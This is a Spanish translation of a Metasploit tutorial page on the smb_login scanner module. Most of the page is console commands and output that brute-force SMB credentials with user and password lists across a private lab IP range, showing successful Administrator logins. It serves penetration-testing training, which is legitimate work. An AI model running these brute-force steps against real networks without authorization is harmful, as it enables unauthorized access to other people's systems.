Smb/smb login
De www.metasploit-es.com.ar
El modulo de Metasploit "smb_login" intentara iniciar sesion via SMB en un rango de direcciones IP dado. Si tienes un plugin de base de datos cargado, los logins exitosos seran guardados en ella para futura referencia y uso.
msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no SMB Domain SMBPass no SMB Password SMBUser no SMB Username STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
Puedes ver claramente que este modulo tiene muchas mas opciones que otros modulos auxiliares y que es bastante versatil. Primeramente ejecutaremos un escaneo utilizando las credenciales de Administrador que hemos 'encontrado'.
msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-165 RHOSTS => 192.168.1.150-165 msf auxiliary(smb_login) > set SMBPass s3cr3t SMBPass => s3cr3t msf auxiliary(smb_login) > set SMBUser Administrator SMBUser => Administrator msf auxiliary(smb_login) > set THREADS 16 THREADS => 16 msf auxiliary(smb_login) > run [*] Starting SMB login attempt on 192.168.1.165 [*] Starting SMB login attempt on 192.168.1.153 ...snip... [*] Starting SMB login attempt on 192.168.1.156 [*] 192.168.1.154 - FAILED LOGIN () Administrator : (STATUS_LOGON_FAILURE) [*] 192.168.1.150 - FAILED LOGIN (Windows 5.1) Administrator : (STATUS_LOGON_FAILURE) [*] 192.168.1.160 - FAILED LOGIN (Windows 5.1) Administrator : (STATUS_LOGON_FAILURE) [*] 192.168.1.154 - FAILED LOGIN () Administrator : s3cr3t (STATUS_LOGON_FAILURE) [-] 192.168.1.162 - FAILED LOGIN (Windows 7 Enterprise 7600) Administrator : (STATUS_ACCOUNT_DISABLED) [*] 192.168.1.161 - FAILED LOGIN (Windows 5.1) Administrator : (STATUS_LOGON_FAILURE) [+] 192.168.1.150 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [*] Scanned 04 of 16 hosts (025% complete) [+] 192.168.1.160 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [*] Scanned 13 of 16 hosts (081% complete) [*] Scanned 14 of 16 hosts (087% complete) [*] Scanned 15 of 16 hosts (093% complete) [*] Scanned 16 of 16 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(smb_login) >
El modulo "smb_login" puede pasarse tambien con una lista de nombres de usuario y contraseñas para intentar iniciar sesion por fuerza bruta a traves de un rango de maquinas.
root@bt:~# cat users.txt Administrator dale chip dookie victim jimmie root@bt:~# cat passwords.txt password god password123 s00pers3kr1t s3cr3t
Utilizaremos este limitado conjunto de nombres de usuario y contraseñas y ejecutaremos el escaner de nuevo.
msf auxiliary(smb_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true yes Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 PASS_FILE no File containing passwords, one per line RHOSTS yes The target address range or CIDR identifier RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no SMB Domain SMBPass no SMB Password SMBUser no SMB Username STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(smb_login) > set PASS_FILE /root/passwords.txt PASS_FILE => /root/passwords.txt msf auxiliary(smb_login) > set USER_FILE /root/users.txt USER_FILE => /root/users.txt msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-165 RHOSTS => 192.168.1.150-165 msf auxiliary(smb_login) > set THREADS 16 THREADS => 16 msf auxiliary(smb_login) > set VERBOSE false VERBOSE => false msf auxiliary(smb_login) > run [-] 192.168.1.162 - FAILED LOGIN (Windows 7 Enterprise 7600) Administrator : (STATUS_ACCOUNT_DISABLED) [*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) dale : [*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) chip : [*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) dookie : [*] 192.168.1.161 - GUEST LOGIN (Windows 5.1) jimmie : [+] 192.168.1.150 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [+] 192.168.1.160 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t' [+] 192.168.1.161 - SUCCESSFUL LOGIN (Windows 5.1) 'victim' : 's3cr3t' [+] 192.168.1.162 - SUCCESSFUL LOGIN (Windows 7 Enterprise 7600) 'victim' : 's3cr3t' [*] Scanned 15 of 16 hosts (093% complete) [*] Scanned 16 of 16 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(smb_login) >
Hay muchas mas opciones disponibles con las que deberias experimentar para familiarizarte completamente con este extremadamente valioso modulo.
© Offensive Security 2009
Original de www.offensive-security.com Traducido por cbk999
